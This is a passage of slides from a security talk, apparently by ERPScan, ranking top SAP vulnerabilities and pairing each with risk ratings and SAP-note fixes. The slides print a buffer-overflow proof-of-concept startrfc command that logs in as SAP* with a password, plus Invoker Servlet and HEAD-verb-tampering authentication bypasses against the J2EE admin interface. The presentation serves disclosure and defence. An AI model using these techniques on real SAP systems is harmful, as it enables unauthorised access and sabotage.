  • 47. 4 – RCE in TH_GREP: Business risks Espionage – High Sabotage – Medium Fraud – High Ease of exploitation – medium
  • 48. 4 – RFC in TH_GREP: Prevention • Install SAP notes 1580017, 1433101 • Prevent access to critical transactions and RFC functions • Check the ABAP code of your Z-transactions for similar vulnerabilities
  • 49. 3 - ABAP Kernel BOF: Description • Presented by Andreas Wiegenstein at BlackHat EU 2011 • Buffer overflow in SAP kernel function C_SAPGPARAM • When NAME field is more than 108 chars • Can be exploited by calling an FM which uses C_SAPGPARAM • Example of report – RSPO_R_SAPGPARAM Author: (VirtualForge)
  • 50. 3 -ABAP Kernel BOF: Details > startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 –u SAP* -p 11111 -F RSPO_R_SAPGPARAM -E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA -t 4 RFC Call/Exception: SYSTEM_FAILURE Group Error group 104 Key RFC_ERROR_SYSTEM_FAILURE Message connection closed without message (CM_NO_DATA_RECEIVED)
  • 51. 3 – ABAP Kernel BOF: Business risks Espionage – Critical Sabotage – Critical Fraud – Critical Ease of exploitation – Medium
  • 52. 3 – ABAP Kernel BOF: Prevention • Install SAP notes: - 1493516 – Correcting buffer overflow in ABAP system call - 1487330 – Potential remote code execution in SAP Kernel • Prevent access to critical transactions and RFC functions • Check the ABAP code of your Z-transactions for critical calls
  • 53. 2 – Invoker Servlet: Description • Rapidly calls servlets by their class name • Published by SAP in their security guides • Possible to call any servlet from the application • Even if it is not declared in WEB.XML Can be used for auth bypass
  • 54. 2 - Invoker Servlet: Details <servlet> <servlet-name>CriticalAction</servlet-name> <servlet-class>com.sap.admin.Critical.Action</servlet-class> </servlet> <servlet-mapping> <servlet-name>CriticalAction</</servlet-name> <url-pattern>/admin/critical</url-pattern> </servlet-mapping <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> Author: Dmitry Chastukhin (ERPScan) What if we call /servlet/com.sap.admin.Critical.Action
  • 55. 2 – Invoker servlet: Business risks Espionage – High Sabotage – High Fraud – High Ease of use – Very easy!
  • 56. 2 - Invoker servlet: Prevention • Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” property of the servlet_jsp must be “false” If you can’t install patches for some reason, you can check all WEB.XML files using ERPScan web.xml scanner manually.
  • 57. 1 – VERB Tampering
  • 58. 1st Place – Verb Tampering <security-constraint> <web-resource-collection> <web-resource-name>Restrictedaccess</web-resource-name> <url-pattern>/admin/*</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> Author: Alexander Polyakov (ERPScan) What if we use HEAD instead of GET ?
  • 59. 1st Place – Verb tampering: Details • CTC – Secret interface for managing J2EE engine • Can be accessed remotely • Can run user management actions: – Add users – Add to groups – Run OS commands – Start/Stop J2EE Remotely without authentication!
  • 60. 1 – Verb tampering: Demo
  • 61. 1 – Verb tampering: More details If patched, can be bypassed by the Invoker servlet!
  • 62. 1 – Verb tampering: Business risks Espionage – Critical Sabotage – Critical Fraud – Critical Ease of use – Very easy!
  • 63. 1st Place – Verb tampering: Prevention Prevention: • Install SAP notes 1503579,1616259 • Install other SAP notes about Verb Tampering (about 18) • Scan applications using ERPScan WEB.XML check tool or manually • Secure WEB.XML by deleting all <http-method> • Disable the applications that are not necessary
  • 64. Conclusion It is possible to be protected from almost all those kinds of issues and we are working hard with SAP to make it secure SAP Guides Regular Security assessments Monitoring technical security ABAP Code review Segregation of Duties It’s all in your hands
  • 65. Future work Many of the researched things cannot be disclosed now because of our good relationship with SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations: • Just4Meeting in July (Portugal) • BlackHat USA in July (Las Vegas)
  • 66. Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.
  • 67. web: www.dsec.ru www.erpscan.com e-mail: info@erpscan.com sales@erpscan.com Twitter: @erpscan @sh2kerr